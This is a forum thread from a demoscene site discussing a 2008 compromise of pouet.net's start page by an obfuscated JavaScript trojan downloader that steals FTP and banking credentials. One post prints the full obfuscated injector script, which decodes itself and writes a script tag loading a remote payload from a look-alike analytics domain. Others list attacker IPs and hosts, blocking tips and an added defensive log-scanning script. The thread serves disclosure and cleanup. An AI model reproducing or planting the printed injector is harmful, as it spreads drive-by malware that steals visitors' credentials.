POUET.NET is hacked / infected with a javascript worm
category: general [glöplog]
Attention: Like lots of other scene websites, pouet.net has a trojan infection embedded in its start page. Admins, remove it from index.php, change FTP passwords.
This is done by the russian business network, the most criminal spam gang in the world. Lots of other scene websites are affected, too.
The trojan sniffs all your FTP traffic, and account data from online banking and lots of other things. The sniffed FTP traffic is then used to login to those accounts and embed the javascript into more pages.
Someone who has FTP access to pouet.net therefore is infected with this trojan, and all his account data is now in the hands of that gang. All users with pouet.net ftp access should check for this trojan now and inform all sites they are logging into by FTP. (And obviously change passwords, credit card numbers etc after the trojan is removed)
For further details, contact me on irc.
Yup - discovered nasty, removed from index, changed password. My AV warned me as soon as I tried to access my own page - can I then assume that I wasn't infected? That hopefully suggests that I didn't already have it...
(er, I mean my untergrund page, obviously)
what javascript worm / trojan ?
tell me more, please.
is it this shit?
Code:
<script language=JavaScript>var mf=" shapgvba ejtf(c){ine ro,con=\" HcvfNU)z\\\"n#hG1*PrTR[4`5('082BVWa]-eZo,}9g$_l+m^6bp~w&IiOA|d@s=y7C:.XMq!xtSj;k{3u\",olq=\"\",i,nnu,l=\"\",n;sbe(ro=0;ro<c.yratgu;ro++){ i=c.puneNg(ro);nnu=con.vaqrkBs(i);vs(nnu>-1){ n=((nnu+1)%81-1);vs(n<=0)n+=81;l+=con.puneNg(n-1); } ryfr l+=i;}olq+=l;qbphzrag.jevgr(olq);}",rmhc="";for(gvg=0;gvg<mf.length;gvg++){ fbd = mf.charCodeAt(gvg);if((fbd>64 && fbd<78)||(fbd>96 && fbd<110)) fbd=fbd+13;else
if((fbd>77 && fbd<91)||(fbd>109 && fbd<123))fbd=fbd-13;rmhc=rmhc.concat(String.fromCharCode(fbd));} var km,ff; eval( rmhc );km="<A~Msi$U7#]FT#FGla&#B#A~Msi$a>U!c~T\"G]$K;Ms$G'Ua<SeRJ:1U7#]FT#FGl\\an#B#S~Msi$\\aUSRel\\a $$i.//;;;KFccF7G#]#7s$s~AK]G$/yyT$,K&A?az!c~T\"G]$KMG=GMMGMza\\a><\\/SeRJ:1>aUmxU</A~Msi$>U"; rwgs(km);</script>
need an obscure java contest.
i commented the javascript code from index.php
hope jeffry will go through the logs and clean whatever else is infected.
i recommend people avoid using pouet for the weekend.
I'm busy alerting lots of server admins etc, so only brief info here:
Gang behind all this:
http://www.bizeul.org/files/RBN_study.pdf
If you are a server admin, grep your ftp logs for the following strings:
85.249.131.45
datapoint.ru
58.65.238.26
If you see successful logins from those ips/hosts, then that user is infected with the trojan, and his website probably also is.
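The log check scamp describes, turned into a small script, is added here as an example and is not code from the thread or from pouet.net. It assumes a vsftpd-style log line format ("[user] OK LOGIN: Client "host"") and the sample log below is constructed; only successful logins count, so a failed attempt from an indicator host is reported separately by the caller, not as a compromised account.

```javascript
// Added example (not from the original post): scan FTP server log lines for
// successful logins from the indicator hosts/IPs listed in the thread.
// The log lines below are a constructed, vsftpd-style sample, not real log data.

const INDICATORS = ['85.249.131.45', 'datapoint.ru', '58.65.238.26'];

// Constructed sample log; the third line is a FAILED login and must not match.
const SAMPLE_LOG = [
  'Sat Feb  2 03:14:07 2008 [pid 2211] [scener] OK LOGIN: Client "85.249.131.45"',
  'Sat Feb  2 03:14:09 2008 [pid 2211] [scener] OK UPLOAD: Client "85.249.131.45", "/htdocs/index.php", 14321 bytes',
  'Sat Feb  2 03:20:41 2008 [pid 2230] [alice] FAIL LOGIN: Client "58.65.238.26"',
  'Sat Feb  2 04:02:13 2008 [pid 2245] [bob] OK LOGIN: Client "192.0.2.17"',
  'Sat Feb  2 04:10:55 2008 [pid 2260] [carol] OK LOGIN: Client "datapoint.ru"',
].join('\n');

// One finding per successful login from an indicator: which account, which indicator, which line.
function findSuspiciousLogins(logText, indicators = INDICATORS) {
  const findings = [];
  for (const line of logText.split('\n')) {
    if (!/OK LOGIN/.test(line)) continue;            // only successful logins
    const hit = indicators.find(ioc => line.includes(ioc));
    if (!hit) continue;
    // the "[user]" bracket group directly before "OK LOGIN" in this log format
    const user = (line.match(/\[([^\]]+)\] OK LOGIN/) || [])[1] || 'unknown';
    findings.push({ user, indicator: hit, line });
  }
  return findings;
}

// Accounts whose owner's machine must be assumed to have leaked the FTP credentials;
// these accounts need locking and a password change from a clean machine.
function compromisedAccounts(logText, indicators = INDICATORS) {
  return [...new Set(findSuspiciousLogins(logText, indicators).map(f => f.user))].sort();
}

for (const f of findSuspiciousLogins(SAMPLE_LOG)) {
  console.log(`${f.user} logged in from indicator ${f.indicator}`);
}
console.log('accounts to lock and re-credential:', compromisedAccounts(SAMPLE_LOG).join(', '));
```

On a real server, feed the script the output of the FTP daemon's log (the format regex is the only part tied to vsftpd) and treat every account it names the way the post says: the user's machine is infected, and the web root that account can write to needs checking for the injected script.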
yes, it's two pieces of code mangled twice, that inserts a script tag pointing to:
"http://www.googleanalitics.net/__utb.js"+ document.referrer
"http://www.googleanalitics.net/__utb.js"+ document.referrer
eltopo: yep, that's the code. beer for whoever can crack what it does :D
p01 the drunkard :D
\:D/ people, to be on the safe side, disable JavaScript on pouet.net
a whois on www.googleanalitics.net says:
Extended Info IP Address: 58.65.238.60
IP Location: Hong Kong
Website Status: active
Server Type: Apache
Cache Date: 2008-02-02 08:05:03 MST
Compare Archived Data: 2007-10-03
and block www.googleanalitics.net using your browser's blocking mechanism or better directly in your .hosts file
presumably this only affects IE?
i must admit i'm a bit in the blue as to how a javascript file on a web page can find my stored ftp login codes.
In case you didn't know Windows users will find theirs in C:\WINDOWS\system32\drivers\etc\
the hosts file that is
And OS X users in /private/etc/hosts
skrebbel: it doesn't - it's a trojan downloader (not clear yet how it works, but also people not using IE at all are affected). That trojan then sniffs all your traffic locally on your PC (all your ftp sessions, ebay visits, online banking etc), and sends it to the "russian business network".
The sniffed FTP transfers are used to get username/passwords of all FTP sites you visit, the transfers and directory listings are used to find out which files to infect on that site. Later their botnet connects to those servers by FTP, infecting those websites. This is how it spreads.
Trojan infections seem to have started some weeks ago, infection of websites started yesterday evening. According to our logs their bots made test logins using stolen account data from January 8th on before they started infecting yesterday.
Yesterday evening I had problems logging in to Pouet from my Windows box. Instead of pouet, I just got a blank page. I wonder if that's got anything to do with it..
scamp: is that a windows trojan or do they infect linux machines too?
Yes, probably. That should be the time they replaced the php files...
p01: that IP is from HostFresh, a cover-up fake ISP run by the RBN:
http://en.wikipedia.org/wiki/Russian_Business_Network
hmm, demoparty.net seems to be infected too
Ok. Some really strange things are going on here. Each time I tried to download SysProt anti-rootkit my browser said the file is corrupted. Then I downloaded it to my shell account. Unpacked it there and downloaded the exe via sftp. Then when it is saved to disk... 1 second later it disappears. Like it is deleted by some external app.